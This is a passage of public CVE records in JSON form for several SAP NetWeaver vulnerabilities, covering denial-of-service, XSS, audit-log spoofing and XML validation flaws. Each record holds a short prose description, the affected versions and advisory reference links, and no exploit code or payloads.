"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2513",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netweaver-diaginput-dos(75455)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75455"
},
{
"name": "https://service.sap.com/sap/support/notes/1687910",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027052"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2513",
"datePublished": "2012-05-15T01:00:00",
"dateReserved": "2012-05-07T00:00:00",
"dateUpdated": "2024-08-06T19:34:25.797Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-4551
Vulnerability from cvelistv5
Published
2016-10-05 16:00
Modified
2024-08-06 00:32
Severity ?
EPSS score ?
Summary
The (1) SAP_BASIS and (2) SAP_ABA components 7.00 SP Level 0031 in SAP NetWeaver 2004s might allow remote attackers to spoof IP addresses written to the Security Audit Log via vectors related to the network landscape, aka SAP Security Note 2190621.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/fulldisclosure/2016/Oct/3 | mailing-list, x_refsource_FULLDISC | |
| https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging | x_refsource_MISC | |
| http://www.securityfocus.com/bid/93288 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:32:25.832Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-036: SAP Security Audit Log invalid address logging",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging"
},
{
"name": "93288",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/93288"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-09-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The (1) SAP_BASIS and (2) SAP_ABA components 7.00 SP Level 0031 in SAP NetWeaver 2004s might allow remote attackers to spoof IP addresses written to the Security Audit Log via vectors related to the network landscape, aka SAP Security Note 2190621."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-036: SAP Security Audit Log invalid address logging",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging"
},
{
"name": "93288",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/93288"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-4551",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The (1) SAP_BASIS and (2) SAP_ABA components 7.00 SP Level 0031 in SAP NetWeaver 2004s might allow remote attackers to spoof IP addresses written to the Security Audit Log via vectors related to the network landscape, aka SAP Security Note 2190621."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-036: SAP Security Audit Log invalid address logging",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Oct/3"
},
{
"name": "https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging",
"refsource": "MISC",
"url": "https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging"
},
{
"name": "93288",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/93288"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-4551",
"datePublished": "2016-10-05T16:00:00",
"dateReserved": "2016-05-06T00:00:00",
"dateUpdated": "2024-08-06T00:32:25.832Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2008-3358
Vulnerability from cvelistv5
Published
2009-01-28 18:00
Modified
2024-08-07 09:37
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document.
References
| ▼ | URL | Tags |
|---|---|---|
| http://service.sap.com/sap/support/notes/1235253 | x_refsource_MISC | |
| http://secunia.com/advisories/33685 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securityfocus.com/archive/1/500415/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.vupen.com/english/advisories/2009/0255 | vdb-entry, x_refsource_VUPEN | |
| http://osvdb.org/51627 | vdb-entry, x_refsource_OSVDB | |
| http://www.securitytracker.com/id?1021638 | vdb-entry, x_refsource_SECTRACK | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/48237 | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/bid/33465 | vdb-entry, x_refsource_BID | |
| http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T09:37:26.604Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://service.sap.com/sap/support/notes/1235253"
},
{
"name": "33685",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/33685"
},
{
"name": "20090127 SAP NetWeaver XSS Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/500415/100/0/threaded"
},
{
"name": "ADV-2009-0255",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2009/0255"
},
{
"name": "51627",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/51627"
},
{
"name": "1021638",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1021638"
},
{
"name": "netweaver-unspecified-xss(48237)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48237"
},
{
"name": "33465",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/33465"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2009-01-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-11T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://service.sap.com/sap/support/notes/1235253"
},
{
"name": "33685",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/33685"
},
{
"name": "20090127 SAP NetWeaver XSS Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/500415/100/0/threaded"
},
{
"name": "ADV-2009-0255",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2009/0255"
},
{
"name": "51627",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/51627"
},
{
"name": "1021638",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1021638"
},
{
"name": "netweaver-unspecified-xss(48237)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48237"
},
{
"name": "33465",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/33465"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2008-3358",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://service.sap.com/sap/support/notes/1235253",
"refsource": "MISC",
"url": "http://service.sap.com/sap/support/notes/1235253"
},
{
"name": "33685",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/33685"
},
{
"name": "20090127 SAP NetWeaver XSS Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/500415/100/0/threaded"
},
{
"name": "ADV-2009-0255",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2009/0255"
},
{
"name": "51627",
"refsource": "OSVDB",
"url": "http://osvdb.org/51627"
},
{
"name": "1021638",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1021638"
},
{
"name": "netweaver-unspecified-xss(48237)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48237"
},
{
"name": "33465",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/33465"
},
{
"name": "http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt",
"refsource": "MISC",
"url": "http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2008-3358",
"datePublished": "2009-01-28T18:00:00",
"dateReserved": "2008-07-29T00:00:00",
"dateUpdated": "2024-08-07T09:37:26.604Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2022-28773
Vulnerability from cvelistv5
Published
2022-04-12 16:11
Modified
2024-08-03 06:03
Severity ?
EPSS score ?
Summary
Due to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/3111293 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |||||
|---|---|---|---|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver (Internet Communication Manager) |
Version: KRNL64NUC 7.22 Version: 7.22EXT Version: 7.49 Version: KRNL64UC 7.22 Version: 7.53 Version: KERNEL 7.22 Version: 7.77 Version: 7.81 Version: 7.85 Version: 7.86 |
||||
|
|||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T06:03:52.639Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3111293"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Internet Communication Manager)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "KRNL64NUC 7.22"
},
{
"status": "affected",
"version": "7.22EXT"
},
{
"status": "affected",
"version": "7.49"
},
{
"status": "affected",
"version": "KRNL64UC 7.22"
},
{
"status": "affected",
"version": "7.53"
},
{
"status": "affected",
"version": "KERNEL 7.22"
},
{
"status": "affected",
"version": "7.77"
},
{
"status": "affected",
"version": "7.81"
},
{
"status": "affected",
"version": "7.85"
},
{
"status": "affected",
"version": "7.86"
}
]
},
{
"defaultStatus": "unaffected",
"product": "SAP Web Dispatcher",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "7.53"
},
{
"status": "affected",
"version": "7.77"
},
{
"status": "affected",
"version": "7.81"
},
{
"status": "affected",
"version": "7.85"
},
{
"status": "affected",
"version": "7.86"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eDue to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically.\u003c/p\u003e"
}
],
"value": "Due to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically.\n\n"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-674",
"description": "CWE-674 Uncontrolled Recursion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-14T13:01:01.412Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/3111293"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2022-28773",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (Internet Communication Manager)",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "KRNL64NUC 7.22"
},
{
"version_affected": "=",
"version_value": "7.22EXT"
},
{
"version_affected": "=",
"version_value": "7.49"
},
{
"version_affected": "=",
"version_value": "KRNL64UC 7.22"
},
{
"version_affected": "=",
"version_value": "7.22EXT"
},
{
"version_affected": "=",
"version_value": "7.49"
},
{
"version_affected": "=",
"version_value": "7.53"
},
{
"version_affected": "=",
"version_value": "KERNEL 7.22"
},
{
"version_affected": "=",
"version_value": "7.49"
},
{
"version_affected": "=",
"version_value": "7.53"
},
{
"version_affected": "=",
"version_value": "7.77"
},
{
"version_affected": "=",
"version_value": "7.81"
},
{
"version_affected": "=",
"version_value": "7.85"
},
{
"version_affected": "=",
"version_value": "7.86"
}
]
}
},
{
"product_name": "SAP Web Dispatcher",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "7.53"
},
{
"version_affected": "=",
"version_value": "7.77"
},
{
"version_affected": "=",
"version_value": "7.81"
},
{
"version_affected": "=",
"version_value": "7.85"
},
{
"version_affected": "=",
"version_value": "7.86"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Due to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically."
}
]
},
"impact": {
"cvss": {
"baseScore": "null",
"vectorString": "null",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-789"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html",
"refsource": "MISC",
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"name": "https://launchpad.support.sap.com/#/notes/3111293",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/3111293"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2022-28773",
"datePublished": "2022-04-12T16:11:30",
"dateReserved": "2022-04-06T00:00:00",
"dateUpdated": "2024-08-03T06:03:52.639Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-0995
Vulnerability from cvelistv5
Published
2014-11-06 15:00
Modified
2024-08-06 09:34
Severity ?
EPSS score ?
Summary
The Standalone Enqueue Server in SAP Netweaver 7.20, 7.01, and earlier allows remote attackers to cause a denial of service (uncontrolled recursion and crash) via a trace level with a wildcard in the Trace Pattern.
References
| ▼ | URL | Tags |
|---|---|---|
| https://twitter.com/SAP_Gsupport/status/522750365780160513 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/60950 | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/97610 | vdb-entry, x_refsource_XF | |
| http://packetstormsecurity.com/files/128726/SAP-Netweaver-Enqueue-Server-Trace-Pattern-Denial-Of-Service.html | x_refsource_MISC | |
| http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability | x_refsource_MISC | |
| http://www.securityfocus.com/archive/1/533719/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/ | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2014/Oct/76 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:34:40.521Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://twitter.com/SAP_Gsupport/status/522750365780160513"
},
{
"name": "60950",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/60950"
},
{
"name": "netweaver-trace-pattern-dos(97610)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/97610"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/128726/SAP-Netweaver-Enqueue-Server-Trace-Pattern-Denial-Of-Service.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability"
},
{
"name": "20141016 [CORE-2014-0007] -SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/533719/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"name": "20141016 [CORE-2014-0007] -SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2014/Oct/76"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-10-16T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Standalone Enqueue Server in SAP Netweaver 7.20, 7.01, and earlier allows remote attackers to cause a denial of service (uncontrolled recursion and crash) via a trace level with a wildcard in the Trace Pattern."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://twitter.com/SAP_Gsupport/status/522750365780160513"
},
{
"name": "60950",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/60950"
},
{
"name": "netweaver-trace-pattern-dos(97610)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/97610"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/128726/SAP-Netweaver-Enqueue-Server-Trace-Pattern-Denial-Of-Service.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability"
},
{
"name": "20141016 [CORE-2014-0007] -SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/533719/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"name": "20141016 [CORE-2014-0007] -SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2014/Oct/76"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-0995",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Standalone Enqueue Server in SAP Netweaver 7.20, 7.01, and earlier allows remote attackers to cause a denial of service (uncontrolled recursion and crash) via a trace level with a wildcard in the Trace Pattern."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://twitter.com/SAP_Gsupport/status/522750365780160513",
"refsource": "CONFIRM",
"url": "https://twitter.com/SAP_Gsupport/status/522750365780160513"
},
{
"name": "60950",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/60950"
},
{
"name": "netweaver-trace-pattern-dos(97610)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/97610"
},
{
"name": "http://packetstormsecurity.com/files/128726/SAP-Netweaver-Enqueue-Server-Trace-Pattern-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/128726/SAP-Netweaver-Enqueue-Server-Trace-Pattern-Denial-Of-Service.html"
},
{
"name": "http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability"
},
{
"name": "20141016 [CORE-2014-0007] -SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/533719/100/0/threaded"
},
{
"name": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/",
"refsource": "MISC",
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"name": "20141016 [CORE-2014-0007] -SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2014/Oct/76"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-0995",
"datePublished": "2014-11-06T15:00:00",
"dateReserved": "2014-01-07T00:00:00",
"dateUpdated": "2024-08-06T09:34:40.521Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-2462
Vulnerability from cvelistv5
Published
2018-09-11 15:00
Modified
2024-08-05 04:21
Severity ?
EPSS score ?
Summary
In certain cases, BEx Web Java Runtime Export Web Service in SAP NetWeaver BI 7.30, 7.31. 7.40, 7.41, 7.50, does not sufficiently validate an XML document accepted from an untrusted source.
References
| ▼ | URL | Tags |
|---|---|---|
| https://launchpad.support.sap.com/#/notes/2644279 | x_refsource_MISC | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993 | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/105326 | vdb-entry, x_refsource_BID |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP | SAP NetWeaver BI |
Version: = 7.30 Version: = 7.31 Version: = 7.40 Version: = 7.41 Version: = 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:21:33.906Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2644279"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"name": "105326",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/105326"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver BI",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 7.30"
},
{
"status": "affected",
"version": "= 7.31"
},
{
"status": "affected",
"version": "= 7.40"
},
{
"status": "affected",
"version": "= 7.41"
},
{
"status": "affected",
"version": "= 7.50"
}
]
}
],
"datePublic": "2018-09-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "In certain cases, BEx Web Java Runtime Export Web Service in SAP NetWeaver BI 7.30, 7.31. 7.40, 7.41, 7.50, does not sufficiently validate an XML document accepted from an untrusted source."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML Validation",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-13T09:57:01",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
